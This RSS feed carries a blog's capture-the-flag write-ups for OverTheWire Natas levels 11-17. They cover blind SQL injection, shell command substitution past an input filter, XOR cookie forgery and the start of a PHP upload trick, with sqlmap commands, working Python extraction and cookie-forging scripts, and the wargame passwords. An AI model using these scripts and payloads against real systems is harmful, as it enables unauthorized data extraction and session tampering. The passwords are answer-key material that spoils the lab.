<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Joon Yoo</title>
    <description>The latest articles on DEV Community by Joon Yoo (@joonhyoo).</description>
    <link>https://dev.to/joonhyoo</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1197943%2F859417a1-a820-4a0d-8b76-75ef855a5c3c.png</url>
      <title>DEV Community: Joon Yoo</title>
      <link>https://dev.to/joonhyoo</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/joonhyoo"/>
    <language>en</language>
    <item>
      <title>Solving Natas 15-17</title>
      <dc:creator>Joon Yoo</dc:creator>
      <pubDate>Tue, 31 Oct 2023 14:09:00 +0000</pubDate>
      <link>https://dev.to/joonhyoo/solving-natas-15-17-44ip</link>
      <guid>https://dev.to/joonhyoo/solving-natas-15-17-44ip</guid>
      <description>&lt;h2&gt;
  
  
  Natas Level 15
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--P3n-WksU--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/svx0nexi3sliuutj4ofo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--P3n-WksU--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/svx0nexi3sliuutj4ofo.png" alt="Image description" width="631" height="218"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This time we see a small login-style box that only reports whether a username exists in the database.&lt;br&gt;
Again, the source code shows the query being run:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Once the quotes are expanded it becomes:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;SELECT * from users where username="input";&lt;br&gt;
&lt;/code&gt;&lt;br&gt;
The input is concatenated into the query unescaped, so SQL injection is possible. The page only tells us whether a row came back, so it acts as a yes/no oracle: we can brute force the natas16 password one character at a time with a condition such as:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;SELECT * from users where username="natas16" and password like binary "%A%";&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;binary&lt;/code&gt; keyword matters: under MySQL's default collation &lt;code&gt;like&lt;/code&gt; is case-insensitive, so without it "a" and "A" would be indistinguishable.&lt;/p&gt;

&lt;p&gt;However, we can use a tool called sqlmap which automates this.&lt;br&gt;
Like most tools that drive a web app, it needs some information so it knows where and how to inject:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--RQ8ItCXw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/53iyicllaa9vjuv5eu2c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--RQ8ItCXw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/53iyicllaa9vjuv5eu2c.png" alt="Image description" width="715" height="370"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The complete call of the script is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sqlmap --auth-type=basic --auth-cred=natas15:TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB -u http://natas15.natas.labs.overthewire.org/index.php --data="username=something" -p username --string=doesn --level=5 --user-agent=Mozilla --dbms=MySQL --threads 4 -D natas15 -T users --dump

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This takes a while to run, because it tries every injection technique it knows against the username parameter. It is capable of many things, such as time-based blind, boolean-based blind, error-based and UNION-based SQL injection, and many other fun pen testing operations! In this case, I've used it as I was too lazy to write a brute force algorithm and kind of wanted to try the tool out.&lt;/p&gt;

&lt;p&gt;Once the tool finishes, it leaves us with these results from the injection:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--hY5sbw4z--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lwrokqw7tkvl8g9yqk7a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--hY5sbw4z--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lwrokqw7tkvl8g9yqk7a.png" alt="Image description" width="430" height="154"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Pass for next level: &lt;strong&gt;TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Natas Level 16
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--7HgvfjKv--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qjc30btuvntqtojgs01v.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--7HgvfjKv--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qjc30btuvntqtojgs01v.png" alt="Image description" width="639" height="282"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This level is similar to Natas 9 &amp;amp; 10 but with even more restrictions on the input.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--H8Jjz0Hh--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ne1f8hmkm1oaikrhgudt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--H8Jjz0Hh--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ne1f8hmkm1oaikrhgudt.png" alt="Image description" width="435" height="116"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In Natas 9 we exploited the use of ; to cat the password file, and in Natas 10 we exploited grep's ability to search several files at once, but neither works here. The key is double-quoted and the source now rejects input containing ; | &amp;amp; ` ' or ", so anything we type reaches grep as a single pattern and the Natas 10 trick no longer applies.&lt;br&gt;
However, if you're familiar with the shell you'll know that $() is command substitution, and the shell still expands it inside double quotes. It can't print the password for us directly, because whatever it outputs just becomes part of the grep pattern, but we can use it to test facts about the password.&lt;/p&gt;

&lt;p&gt;Reading the source code, we see that the page prints every dictionary word that case-insensitively matches our input.&lt;br&gt;
Using command substitution, we can test guesses about the natas17 password and build it up until we have the whole thing. The key idea is that if we put&lt;br&gt;
&lt;code&gt;$(grep somecharacters thepasswordfilefornatas17)&lt;/code&gt;&lt;br&gt;
in our input, the substitution expands to the matching line if -somecharacters- appears in the natas17 password, and to nothing otherwise. So we send a normal word followed by the substitution. If grep matches, the password gets appended to our word, the combined pattern matches nothing in the dictionary and the page comes back empty; if grep doesn't match, the pattern is just our word and the page shows the dictionary result.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--0KwwHI5T--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/u23tr18wwpi1b2donv4x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--0KwwHI5T--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/u23tr18wwpi1b2donv4x.png" alt="Image description" width="624" height="291"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--jnzP-zap--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/x1tsunpnih70ps8beufh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--jnzP-zap--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/x1tsunpnih70ps8beufh.png" alt="Image description" width="632" height="297"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As the output still shows zooms, we know that "a" is not in the password.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--pPczXL8c--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wq1rw8kwwogancqz0151.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--pPczXL8c--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wq1rw8kwwogancqz0151.png" alt="Image description" width="631" height="264"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As the output shows nothing, we know that x is in the password.&lt;br&gt;
We first test every letter and digit on its own to learn which characters occur in the password, then search for longer substrings built only from that smaller set until we have the full string. Finding the character set first cuts the work considerably: each position only has to be tested against the handful of characters that actually occur rather than all 62 letters and digits.&lt;br&gt;
This is the python script I wrote for this.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--PVCkKbfy--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f9xhiuu68g70pwbs4bbx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--PVCkKbfy--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f9xhiuu68g70pwbs4bbx.png" alt="Image description" width="800" height="435"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The result of running the script was this:&lt;br&gt;
(It took around 30 minutes, I went to eat some food while the script ran)&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--UUy518OM--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/24mzj12wlecmepbbts1l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--UUy518OM--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/24mzj12wlecmepbbts1l.png" alt="Image description" width="456" height="931"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Pass for next level: &lt;strong&gt;XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd&lt;/strong&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Natas Level 17
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--5AvjqPNA--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i40g4xzxg6921gbvj84m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--5AvjqPNA--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i40g4xzxg6921gbvj84m.png" alt="Image description" width="670" height="222"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This level looks like level 15. Level 15 was exploitable with a boolean-based blind SQL injection, because the page told us whether the query matched. In this level every print statement has been commented out, so checking a username always gives an empty page and there is no text output to compare.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Vs3pDynl--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dubrpnp152s4w6q35ty2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Vs3pDynl--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dubrpnp152s4w6q35ty2.png" alt="Image description" width="646" height="337"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Typically we would use a time-based blind SQL injection, where we combine our condition with a sleep function. We AND (in MySQL also spelt &amp;amp;&amp;amp;) a SLEEP() call onto the condition so the database only pauses when the condition is true, and then we measure how long each request takes:&lt;/p&gt;

&lt;p&gt;The query returns a result before our expected time =&amp;gt; it didn’t work&lt;/p&gt;

&lt;p&gt;The query returns a result after our expected time =&amp;gt; it did work&lt;/p&gt;

&lt;p&gt;This is the principle behind time-based blind SQLi. There are some drawbacks: network jitter or a busy server can make a fast response look slow and give a false positive, but that can be handled by using a longer delay and repeating borderline measurements (with the obvious drawback being a slower attack).&lt;br&gt;
I decided to use the sqlmap tool again in a similar way to level 15 to get myself familiar with using pen testing tools, but it is entirely possible to write a python script which does the same thing I'm doing, and probably faster as well, because sqlmap first spends time detecting the vulnerability and then tries several techniques.&lt;br&gt;
&lt;/p&gt;
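&lt;p&gt;The same extraction loop drives both level 15 and level 17; only the oracle changes. The following is an added example (neither the author's script nor sqlmap's code) that shows both oracles against a local stand-in for the vulnerable page: a SQLite in-memory table with the username concatenated into the query, a &lt;code&gt;sleep()&lt;/code&gt; function registered to play the role of MySQL's SLEEP(), and &lt;code&gt;PRAGMA case_sensitive_like&lt;/code&gt; standing in for &lt;code&gt;LIKE BINARY&lt;/code&gt;. The table, the demo password and the single-quoted string syntax are assumptions of the demo; against Natas the quote character is a double quote and the condition would read &lt;code&gt;password LIKE BINARY "..."&lt;/code&gt;.&lt;/p&gt;

```python
import sqlite3
import string
import time

# Constructed demo secret, not a real Natas password (same shape: 32 alphanumerics).
DEMO_PASSWORD = "Hx9TQa2zKqW0pLmN7vRbYc4dEfGhJk1s"
ALPHABET = string.ascii_letters + string.digits


def make_vulnerable_endpoint(secret, silent=False):
    """Stand-in for the Natas 15/17 PHP: the username is pasted into the query.
    Returns (page_text, elapsed_seconds). silent=True mimics Natas 17, where
    every print statement is commented out."""
    db = sqlite3.connect(":memory:")
    db.execute("PRAGMA case_sensitive_like = ON")  # SQLite stand-in for MySQL's LIKE BINARY
    db.create_function("sleep", 1, lambda s: time.sleep(s) or 0)  # mimics MySQL SLEEP(): returns 0
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('natas16', ?)", (secret,))

    def endpoint(username):
        query = "SELECT * FROM users WHERE username='" + username + "'"  # the injection point
        start = time.monotonic()
        try:
            rows = db.execute(query).fetchall()
        except sqlite3.Error:
            return "Error in query.", time.monotonic() - start
        elapsed = time.monotonic() - start
        if silent:
            return "", elapsed
        return ("This user exists." if rows else "This user doesn't exist."), elapsed
    return endpoint


def boolean_oracle(endpoint):
    """Natas 15: the page text says whether a row came back."""
    def oracle(condition):
        text, _ = endpoint(f"natas16' AND ({condition}) AND '1'='1")
        return "This user exists." in text
    return oracle


def timing_oracle(endpoint, delay=0.05):
    """Natas 17: no page text, so make the database sleep only when the
    condition holds and measure the response. CASE evaluates lazily, so
    sleep() never runs on a miss (MySQL equivalent: AND IF(cond, SLEEP(5), 0))."""
    def oracle(condition):
        injected = (f"natas16' AND (CASE WHEN ({condition}) THEN sleep({delay}) ELSE 0 END)"
                    f" AND '1'='1")
        _, elapsed = endpoint(injected)
        return elapsed >= delay / 2
    return oracle


def find_charset(oracle, alphabet=ALPHABET):
    """First pass (the post's optimisation): which characters occur at all?
    Shrinks the per-position candidate list from 62 to the ones that appear."""
    return [c for c in alphabet if oracle(f"password LIKE '%{c}%'")]


def extract_password(oracle, alphabet=ALPHABET, max_len=32):
    """Second pass: grow a prefix one character at a time, anchored at the start."""
    known = ""
    for _ in range(max_len):
        for c in alphabet:
            if oracle(f"password LIKE '{known}{c}%'"):
                known += c
                break
        else:
            break  # nothing extends the prefix: the whole password is known
    return known


if __name__ == "__main__":
    oracle = boolean_oracle(make_vulnerable_endpoint(DEMO_PASSWORD))
    charset = find_charset(oracle)
    print("characters present:", "".join(charset))
    print("recovered:", extract_password(oracle, alphabet=charset))
```

&lt;p&gt;Run it directly to watch the boolean version recover the demo password. To point either oracle at a real target, replace &lt;code&gt;make_vulnerable_endpoint&lt;/code&gt; with a function that POSTs the username and returns the response body and the elapsed time; the two oracle constructors and the extraction loop stay the same.&lt;/p&gt;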

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sqlmap --auth-type=basic --auth-cred=natas17:XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd -u http://natas17.natas.labs.overthewire.org/index.php --data="username=something" -p username --level=5 --user-agent=Mozilla --dbms=MySQL --threads 1 -D natas17 -T users --dump
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In this run we dropped &lt;code&gt;--string&lt;/code&gt;, since the page no longer shows any text to match, and we force a single thread: parallel requests compete for the server and the network, which skews the response times the timing oracle depends on and produces false positives/negatives. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--WjODF8Qd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/11cl2a6ta9f5do23t1wz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--WjODF8Qd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/11cl2a6ta9f5do23t1wz.png" alt="Image description" width="433" height="170"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After 2 hours, we get the passwords. Time-based extraction is slow by nature: every character of every 32-character password needs several requests, and each positive answer costs a full sleep, so dumping a table of long strings like this one takes a long time.&lt;/p&gt;

&lt;p&gt;Pass for next level: &lt;strong&gt;8NEDUUxg8kFgPV84uLwvZkGn6okJQ6aq&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learnt&lt;/strong&gt;&lt;br&gt;
These levels were quite difficult to do. However it was great fun to learn about time delay based sql attacks and how time consuming they can be due to network interruptions. Many of these solutions involved brute force attacks, and writing up my own script for level 16 was fun as it has been a while since I used python for anything.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Solving Natas Levels 11-14</title>
      <dc:creator>Joon Yoo</dc:creator>
      <pubDate>Tue, 31 Oct 2023 13:49:18 +0000</pubDate>
      <link>https://dev.to/joonhyoo/solving-natas-levels-11-14-1ah2</link>
      <guid>https://dev.to/joonhyoo/solving-natas-levels-11-14-1ah2</guid>
      <description>&lt;p&gt;&lt;strong&gt;Natas Level 11&lt;/strong&gt;&lt;br&gt;
This level opens up with a simple background color changing application.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--skFSDTvg--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gkf7yq2r2lx8i93ledb1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--skFSDTvg--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gkf7yq2r2lx8i93ledb1.png" alt="Image description" width="645" height="223"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We have access to the source code again, and reading it we see that the default data is loaded with a loadData function.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;$defaultdata = array( "showpassword"=&amp;gt;"no", "bgcolor"=&amp;gt;"#ffffff");&lt;br&gt;
$data = loadData($defaultdata);&lt;/code&gt;&lt;br&gt;
The loadData function starts with the defaults in the mydata variable and checks whether the cookie has the key "data".&lt;br&gt;
If it does, it base64-decodes the cookie value, runs it through the custom xor_encrypt function and JSON-decodes the result into tempdata. Then it checks that tempdata is an array with the keys "showpassword" and "bgcolor". If so, and if bgcolor matches the format of a hex colour (#123456), it copies the two values from tempdata into mydata and returns it.&lt;/p&gt;

&lt;p&gt;For us to return an altered version of the mydata variable, a couple things must be true:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The cookie has the "data" key in it&lt;/li&gt;
&lt;li&gt;The three-step decode (base64_decode, xor_encrypt, json_decode) of the cookie "data" must yield an array&lt;/li&gt;
&lt;li&gt;The array must have a key showpassword and bgcolor&lt;/li&gt;
&lt;li&gt;The bgcolor value must match the format of a hexcode&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;It appears that what we need to do is change the cookie in such a way that, once it comes out of the three-step decode, it results in an array with the key "showpassword" set to "yes" and a bgcolor key set to some hex colour.&lt;br&gt;
Luckily for us, json_decode and base64_decode have their respective encode functions built into PHP, so we just need the inverse of each. So let's take a deeper look at how we can undo the xor function.&lt;br&gt;
XOR is commutative and associative, and every value is its own inverse (A xor A = 0). This means that if:&lt;/p&gt;

&lt;p&gt;A xor B = C, then&lt;br&gt;
A xor C = B, and&lt;br&gt;
C xor A = B, and B xor C = A.&lt;/p&gt;

&lt;p&gt;In this case we have a key, a plaintext and an output. We can apply the same principle to find the key the xor function is using, so we can produce whatever output we like.&lt;br&gt;
IN xor KEY = OUTPUT, then&lt;br&gt;
IN xor OUTPUT = KEY&lt;br&gt;
We know both sides: the plaintext is the JSON-encoded default array from the source, and the output is the base64-decoded cookie the site set for us. To get the cookie from the site, we go to the dev tools, enter document.cookie into the console and copy the data we get.&lt;br&gt;
&lt;code&gt;Cookie = MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgubjY&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--frkGCk0_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/08bvzjtps701x3knl2iv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--frkGCk0_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/08bvzjtps701x3knl2iv.png" alt="Image description" width="775" height="351"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After running this function, it returns:&lt;br&gt;
KNHLKNHLKNHLKNHLKNHLKNHLKNHLKNHLKNHLKNHLK&lt;br&gt;
xor_encrypt cycles through the key when the text is longer than the key, so a 4-byte key shows up as a repeating pattern and we can determine that our key is 'KNHL'. Now using this information, we want an array with showpassword set to yes and a valid bgcolor hex code. Applying the principle from earlier:&lt;br&gt;
ARRAY xor KEY = COOKIE&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--KTjEBURQ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nyl0jhj5wqqa3n4tic9j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--KTjEBURQ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nyl0jhj5wqqa3n4tic9j.png" alt="Image description" width="691" height="372"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As explained earlier, we reverse what happens to the cookie data (json_encode, xor_encrypt, base64_encode) to get a valid cookie holding our required information. Now we just need to set our cookie to the value that comes out of this function:&lt;br&gt;
&lt;code&gt;MGw7JCQ5OC04PT8jOSpqdmk3LT9pYmouLC0nICQ8anZpbS4qLSguKmkz&lt;/code&gt;&lt;br&gt;
We can do this by going to the dev tools again and typing&lt;br&gt;
&lt;code&gt;document.cookie="data=thecookieyougot"&lt;/code&gt;&lt;br&gt;
Upon refreshing the page with our new cookie:&lt;/p&gt;
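&lt;p&gt;The whole procedure, recovering the key from the cookie and forging a new one, as an added Python example (not the author's code; the level's PHP is represented only by an equivalent of its xor_encrypt). It uses the cookie value and default array quoted above; the padding restoration and the period search are additions of this example.&lt;/p&gt;

```python
import base64
import json
from itertools import cycle

# Values from the post: the cookie the site set (its trailing '=' padding was
# lost in the document.cookie output) and the default array from the source.
ORIGINAL_COOKIE = "MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgubjY"
DEFAULT_DATA = {"showpassword": "no", "bgcolor": "#ffffff"}


def php_json_encode(obj) -> bytes:
    """PHP's json_encode writes no spaces; Python's default does, so set separators."""
    return json.dumps(obj, separators=(",", ":")).encode()


def b64decode_lenient(s: str) -> bytes:
    """Restore any '=' padding stripped on the way through the browser."""
    return base64.b64decode(s + "=" * (-len(s) % 4))


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """Same as the level's xor_encrypt(): byte i is XORed with key[i mod len(key)].
    Because X ^ K ^ K == X, the same function both encrypts and decrypts."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def shortest_period(stream: bytes) -> bytes:
    """Smallest prefix that, repeated, reproduces the whole key stream."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def recover_key(cookie: str, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: ciphertext xor plaintext = the repeated key."""
    keystream = xor_encrypt(b64decode_lenient(cookie), known_plaintext)
    return shortest_period(keystream)


def forge_cookie(data: dict, key: bytes) -> str:
    """Run the server's decode steps backwards: json_encode, xor, base64."""
    return base64.b64encode(xor_encrypt(php_json_encode(data), key)).decode()


def decode_cookie(cookie: str, key: bytes) -> dict:
    """What loadData() will see for a given cookie (sanity check before sending)."""
    return json.loads(xor_encrypt(b64decode_lenient(cookie), key))


if __name__ == "__main__":
    key = recover_key(ORIGINAL_COOKIE, php_json_encode(DEFAULT_DATA))
    print("key:", key.decode())
    forged = forge_cookie({"showpassword": "yes", "bgcolor": "#ffffff"}, key)
    print('document.cookie="data=' + forged + '"')
```

&lt;p&gt;Running it prints the key KNHL and the forged cookie value shown above; if the site's cookie ever carries trailing padding again, remember that a literal = in a cookie value has to be sent URL-encoded as %3D.&lt;/p&gt;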

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--rYcIELts--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/x4l4lsq3vmnlwxlvu9w7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--rYcIELts--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/x4l4lsq3vmnlwxlvu9w7.png" alt="Image description" width="649" height="245"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Pass for next level: &lt;strong&gt;YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Natas Level 12&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--YTRDNR-R--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xzrgfu7bxjsd8m750e48.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--YTRDNR-R--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xzrgfu7bxjsd8m750e48.png" alt="Image description" width="652" height="237"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We are presented with a simple page to choose and upload a file. Reading the source code, we can see that it accepts what it expects to be JPEG files, gives them a random name and stores them on the server.&lt;br&gt;
The important thing to note is that once the file is there, the page generates a link to it. If we can get PHP code stored under a .php name, the server will execute it when we open the link.&lt;/p&gt;

&lt;p&gt;First, we’ll create a fake jpg that will echo the password for the next level as we have done in previous levels by peeking into the webpass folder.&lt;/p&gt;

